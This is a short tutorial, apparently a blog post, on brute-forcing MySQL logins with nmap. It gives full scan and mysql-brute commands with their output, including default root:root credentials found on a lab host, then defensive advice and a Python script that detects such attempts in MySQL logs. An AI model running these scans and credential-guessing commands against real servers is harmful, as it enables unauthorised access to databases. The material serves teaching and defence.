In this tutorial, I'll be demonstrating a brute force attack on a MySQL Database Server using an Nmap script scan.
Before we move ahead, let us understand what a Brute Force Attack and the Nmap Scripting Engine are.
What is Brute Force Attack?
In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. This task is performed by scripts or automated tools.
In short, the script will try usernames & passwords from an available list; this is also called a dictionary-based attack.
Nmap comes with a known username & password list, which can be found at the path /usr/share/nmap/nselib/data
What is Nmap Scripting Engine?
The Nmap Scripting Engine lets Nmap interact with a target using scripts written in the Lua programming language.
Nmap is installed with a set of default scripts, which can be found at the path /usr/share/nmap/scripts
So, let us perform a Brute Force Attack on the target MySQL Server using the steps below.
1. Check which systems on the target network are running MySQL using the command below.
iamvsm@SaraswatiRepository:~$ nmap -p 3306 --open 192.168.20.0/24
Nmap scan report for 192.168.20.77
Host is up (0.00058s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 192.168.20.91
Host is up (0.00051s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 192.168.20.107
Host is up (0.00048s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.05 seconds
Note: Port 3306 is the MySQL Server application port & --open shows only systems where that port is open.
As we can see, there are three MySQL Servers running on the target network 192.168.20.0/24.
Now we'll select any one of them to perform the MySQL Brute Force Attack. Let's say we'll perform the attack on MySQL Server 192.168.20.77
2. Performing Brute Force Attack on MySQL Server using Nmap Script
iamvsm@SaraswatiRepository:~$ nmap --script mysql-brute -p 3306 192.168.20.77
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 17:05 IST
Nmap scan report for 192.168.20.77
Host is up (0.00065s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-brute:
| Accounts:
| root:root - Valid credentials
|_ Statistics: Performed 45027 guesses in 8 seconds, average tps: 5628.4
Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds
We were successfully able to find the username & password of the MySQL Server by Brute Force Attack using the Nmap script "mysql-brute.nse" (available at the path /usr/share/nmap/scripts).
We'll also try another server, let's say 192.168.20.107
iamvsm@SaraswatiRepository:~$ nmap --script mysql-brute -p 3306 192.168.20.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 17:13 IST
Nmap scan report for 192.168.20.107
Host is up (0.00055s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 50029 guesses in 11 seconds, average tps: 4548.1
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
On this one we failed, because this server has kept its MySQL username & password strong. This attack only works when you have kept a default or known username & password that appears in the dictionary.
Recommendation
It is recommended to keep your database credentials strong & deny remote root login. Permit only the web server to communicate with the database server rather than leaving it open to all.
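A guessing run like the one shown above is also easy to spot on the server side. The following is an added example, not part of the original tutorial: it counts failed logins per source address in a MySQL error log, assuming MySQL 5.7-style log lines with log_error_verbosity=3; the sample log lines and source addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: MySQL 5.7-style error-log lines (assumes
# log_error_verbosity=3, so failed logins are written as notes).
SAMPLE_LOG = """\
2020-10-09T11:35:01.100000Z 41 [Note] Access denied for user 'root'@'192.168.20.50' (using password: YES)
2020-10-09T11:35:01.300000Z 42 [Note] Access denied for user 'admin'@'192.168.20.50' (using password: YES)
2020-10-09T11:35:01.500000Z 43 [Note] Access denied for user 'guest'@'192.168.20.50' (using password: YES)
2020-10-09T11:35:01.700000Z 44 [Note] Access denied for user 'test'@'192.168.20.50' (using password: YES)
2020-10-09T11:35:02.000000Z 45 [Note] Access denied for user 'web'@'192.168.20.50' (using password: YES)
2020-10-09T11:35:02.200000Z 46 [Note] Access denied for user 'user'@'192.168.20.50' (using password: YES)
2020-10-09T11:40:00.000000Z 47 [Note] Access denied for user 'app'@'192.168.20.10' (using password: YES)
2020-10-09T11:41:00.000000Z 0 [Note] Event Scheduler: Loaded 0 events
"""

DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z .*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def find_bruteforce(lines, threshold=5, window_seconds=10):
    """Return {source_host: sorted usernames tried} for each source with at least
    `threshold` failed logins inside `window_seconds`. Lines must be chronological."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # host -> failure timestamps inside the window
    users = defaultdict(set)      # host -> usernames seen in failed logins
    flagged = set()
    for line in lines:
        m = DENIED.match(line)
        if not m:
            continue              # not a failed-login line
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        host = m["host"]
        users[host].add(m["user"])
        q = recent[host]
        q.append(ts)
        while ts - q[0] > window: # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(host)
    return {h: sorted(users[h]) for h in flagged}

if __name__ == "__main__":
    for host, tried in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"possible brute force from {host}: users tried {tried}")
```

A single mistyped password, like the one from 192.168.20.10 in the sample, stays below the threshold and is not reported.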
In my upcoming post I’ll illustrate how to secure your MySQL Database Server.